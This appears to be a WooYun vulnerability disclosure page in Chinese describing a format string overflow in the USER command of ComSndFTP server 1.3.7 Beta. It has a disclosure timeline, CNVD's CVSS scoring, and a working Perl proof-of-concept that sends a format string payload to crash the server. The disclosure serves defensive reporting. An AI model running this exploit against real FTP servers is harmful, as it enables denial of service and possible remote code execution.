当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-08114

漏洞标题:ComSndFTP服务器格式化字符溢出漏洞

相关厂商:http://ftp.comsnd.com/

漏洞作者: demonalex

提交时间:2012-06-09 16:28

修复时间:2012-07-24 16:29

公开时间:2012-07-24 16:29

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-06-09: 细节已通知厂商并且等待厂商处理中
2012-06-13: 厂商已经确认,细节仅向厂商公开
2012-06-16: 细节向第三方安全合作伙伴开放
2012-08-07: 细节向核心白帽子及相关领域专家公开
2012-08-17: 细节向普通白帽子公开
2012-08-27: 细节向实习白帽子公开
2012-07-24: 细节向公众公开

简要描述:

ComSndFTP服务器(版本:1.3.7 Beta)的部分FTP指令存在格式化字符溢出漏洞,可导致拒绝服务以及执行远程系统代码的后果。

详细说明:

ComSndFTP服务器(版本:1.3.7 Beta)的USER指令存在格式化字符溢出漏洞。

漏洞证明:

Proof Of Concept :
-----------------------------------------------------------
#!/usr/bin/perl -w
#ComSndFTP Server Remote Format String Overflow Exploit
#Written by [email protected]
use IO::Socket;
$|=1;
$host=shift || die "$0 \$host \$port\n";
$port=shift || die "$0 \$host \$port\n";
$evil = '%s%p%x%d';
print "Launch Attack ... ";
$sock1=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp', Timeout=>30) || die "HOST $host PORT $port is down!\n";
if(defined($sock1)){
$sock1->recv($content, 100, 0);
sleep(2);
$sock1->send("USER ".$evil."\r\n", 0);
sleep(2);
$sock1->recv($content, 100, 0);
sleep(5);
$sock1->close;
}
print "Finish!\n";
exit(1);
-----------------------------------------------------------

修复方案:

使用安全的函数进行数据处理。

版权声明:转载请注明来源 demonalex@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2012-06-13 16:58

厂商回复:

CNVD确认漏洞情况,demonalex同学还是一如继往的在溢出漏洞方面进行研究。
对漏洞评分如下:
CVSS:(AV:R/AC:L/Au:NR/C:P/A:C/I:N/B:N) score:8.47(最高10分,高危)
即:远程攻击、攻击难度低、不需要用户认证,对可用性构成完全影响,对机密性构成部分影响(本身是否root权限暂未认定)。
技术难度系数:1.0
影响危害系数:1.2(以一般影响评估,涉及客户未知)
CNVD综合评分:8.47*1.0*1.2=10.164

最新状态:

暂无